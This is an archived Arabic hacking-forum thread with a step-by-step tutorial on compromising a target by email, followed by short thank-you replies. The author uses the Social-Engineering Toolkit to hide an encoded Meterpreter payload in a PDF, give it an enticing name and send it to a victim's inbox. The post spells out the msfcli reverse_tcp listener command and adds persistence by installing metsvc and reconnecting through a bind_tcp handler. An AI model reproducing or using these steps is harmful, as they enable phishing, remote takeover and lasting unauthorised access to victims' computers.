:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   Penteration Testing Training (http://www.vbspiders.com/vb/f278.html)
-   -   Hack with Social Engineering (http://www.vbspiders.com/vb/t25005.html)

Cyber Code 02-15-2010 01:16 PM

Hack with Social Engineering
 
السلام عليكم ورحمة الله وبركاته
بـسم الله الرحمن الرحيم

الموضوع اهداء لكل اعضاء VbSpiDerS و منقول من Dr.Linux للفائدة


اليوم بنتكلم عن الاختراق بالهندسة الاجتماعية ( Social Engineering ) و هي ما يعرف باقناع الضحية بما حوله من البيئة المحيطة به على الانترنت او ايا كان .. و لا يخفى على الجميع ان اشهر مهندس اجتماعي هو كيفين ميت***

بحاول اني ما اخرج عن الموضوع .. ( باختصار هي التلاعب بالناس لفعل ما تريد لكي تحصل على ما تريد )

بصراحة و بالنسبة لي .. تعتبر الهندسة الاجتماعية سلآح فتاك و خطير لانها لا تتوقف على اقفال ثغرة معينة او حماية للنظام و ما الى ذلك .. لانه بعد اقناع الضحية لا شيء يقف امام الوصول لما تريد .

نرجع لموضوعنا ..

كيف تتم العملية ؟

1-عن طريق اداة من صناعة المبرمج ديفيد كنيدي ( مبرمج الفاست تراك )
2-حقن بايلود مشفر من جميع الحمايات بكتاب الكتروني بصيغة pdf
3-ارسال الملف لبريد الضحية على الانبوكس
4-التنصت و الانتظار حتى يتم الاتصال بالضحية

ماهي الادوات اللازمة للقيام بالعملية ؟


1-Social-Engineering Toolkit
2-Gmail account
3-M3tasploit

طبعا كل الادوات متوفرة على الباك تراك الا Social-Engineering Toolkit سوف نقوم بتحميلها و صنع مجلد لها

نبدا مع اول امر وهو لتحميل الاداة و صنع مجلد لها

كود:
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
ملاحظة : يجب ان تكون root ..

صورة للتوضيح بعد تطبيق الامر و تكوين المجلد :
http://www5.0zz0.com/2009/11/25/03/359408214.png

الان ندخل على مجلد الاداة بالامر :
كود:
cd SET
من ثم نشغل الادة عن طريق الامر :
كود:
./set
و هذي صورة توضيحية للامرين ..
http://img682.imageshack.us/img682/9254/77377213.png
اشرح لكم الخيارات ..

الخيار رقم 1 لعمل هندسة اجتماعية عبر الايميل ..

الخيار رقم 2 لعمل هندسة اجتماعية عبر صفحات الويب

و الخيارات الباقية للتحديث و صنع بايلودات ..

عموما هجومنا هو رقم 1 اللي يتم عن طريق الايميل ..

نختار الخيار الاول بالرقم 1 و نشوف :
http://img265.imageshack.us/img265/9030/84211353.png
مثل ماهو واضح بالصورة .. طلع لنا خيارين ثانية نختار الخيار الاول بالرقم 1 ثم راح يسالك اذا تبي تكون بايلود او لا نختار نعم
http://img222.imageshack.us/img222/1118/92585250.png
الان ظهر لنا عدة خيارات لطريقة زرع البايلود اللي تبي تكونه داخل الكتاب الالتروني ..

نختار رقم 4 لانه هو الفعال دائما .. اما الباقي فهو عن طريق ثغرات اي ان هناك احتمال بعدم نجاح العملية ..

و بعد ما اخترنا الاستغلال المناسب .. الان نحدد البايلود المناسب و يفضل Meterpreter
http://img265.imageshack.us/img265/2797/67450179.png
بعد تحديد البايلود .. الان بيطلب منك الاي بي تبعك للاتصال بالضحية و بيطلب منك البورت اللي راح يتم التنصت عليه نحددها و نكمل شغلنا ..
http://img137.imageshack.us/img137/6549/69706649.png
الان اكتملت الاعدادات و تم صناعة الملف و البايلود بنجاح ..

نضغط انتر لاستكمال العملية و ارسال الملف

بيظهر لك خيارين .. الاول اذا كنت تبي تترك اسم الملف زي ماهو تختاره ..

الثاني يقلك لا .. لازم اظهر بمظهر اكثر جاذبية للضحية

طبعا اكيد نختار الخيار الثاني و نسمي الملف باسم جذاب ..
http://img187.imageshack.us/img187/8600/10899339.png
الان ايضا .. ظهر لنا خيارين جديدة الخيار الاول يعني ارسال الملف لايميل واحد فقط
اما الخيار الثاني فهو لارسال الملف لعدة ايميلات !

نختار الخيار الاول .. بالرقم 1 < انت بامكانك تختار الخيار الثاني

بعد ما اخترنا الخيار الاول الان ظهرت لنا خيارات اخرى تفيد عنوان الرسالة و ما بداخلها

طبعا يوجد اكثر من خيار .. بالنسبة لي انا اعجبتني الرسالة رقم 4 و انت اذا ما عجبك شيء بامكانك تكتب رسالة اخرى من تاليفك بالرقم 6
http://img69.imageshack.us/img69/6973/67292319.png
بعد ما حددنا الرسالة المطلوبة الان يطلب منا تحديد الايميل المراد استهدافه ..

نحدده و نتبع الخيارات المتبقية ..



بعد ما تم تحديد ايميل الضحية .. طلب منا عنوان المرسل فاخترت عن طريق حساب gmail و ادخلت الحساب و الباسورد .. و من ثم طلب مني اذا كنت ابي اتنصت و لا لا و اخترت لا لاني بعد شوي راح اتنصت يدويا افضل ..

الان تم ارسال الرسالة وش رايكم نشوف كيف شكلها ؟
http://img406.imageshack.us/img406/2913/52218299.png
حلوو .. واضحة الرسالة و الملف مرفق معها .. و بنفس عنوان الرسالة اللي اخترناه قبل شوي !

طيب الان نتنصت لانتظار الضحية بالامر :
كود:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=5555 E
الان نلاحظ الصورة بعد ما تنصتنا و بعد ما فتح الضحية الملف ظهور جلسة جديدة !
http://img81.imageshack.us/img81/5126/46122813.png
================================================== =======================

اضافة بسيطة و مفيدة جدا

و هي ثبات الضحية و المقدرة للرجوع اليه في اي وقت تحبه .. وهو ما يعرف بالـ metsvc

حلوو ..

بعد ما وصلنا لجهاز الضحية مثل ماهو وآضح فوق راح ننفذ امر بسيط جدا لتثبيت خدمة الـ metsvc

الامر :
كود:
run metsvc
http://img204.imageshack.us/img204/2693/95635567.png
الان بعد تنصيب الخدمة و في حال خروج الضحية ..

تقدر ترجع للضحية بالامر التالي :
كود:
./msfcli exploit/multi/handler PAYLOAD=windows/metsvc_bind_tcp LPORT=31337 RHOST=192.168.1.3 E
بحيث RHOST= اي بي الضحية و LPORT= البورت تبع الخدمة وهو ثابت

نلاحظ الصورة
http://img267.imageshack.us/img267/4302/63626588.png

سلاام

data$hack 02-15-2010 03:34 PM

good bro keep up

Cyber Code 02-16-2010 05:13 PM

منور الموضوع يالغالي , بارك الله فيك
ومشكور على التثبيت :)

El3ctr0-Dz 04-02-2010 12:28 AM

شكرا لك حبييبي دارك
بارك الهل فيك على الموضوع الجميل
و لااحد يستطيع قهر الهندسة الاجتماعية

D-GhosT s3cur!Ty-Z 07-27-2010 09:51 PM

موضوع شيق ورائع

الف شكر لك بس لوكان شرح فيدو راح يكون اكثر متعة

الف شكر لك اخي دارك

Dr.NaNo 01-01-2011 02:51 AM

ياسلام شرح جممممممميل جدأأ بارك الله فيك ياغالي واصصل ابداعكـ.




تحياتي لكـ.

head-shot 02-04-2011 11:11 PM

good job bro big up :D

سجين الوطن 09-08-2011 09:59 PM

رد: Hack with Social Engineering
 
مشكور اخوي

kimcam 09-29-2011 12:46 PM

رد: Hack with Social Engineering
 
بارك الله فيك أخي

Stone Love 09-14-2012 11:40 PM

رد: Hack with Social Engineering
 
Go Ahead :)


الساعة الآن 05:20 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0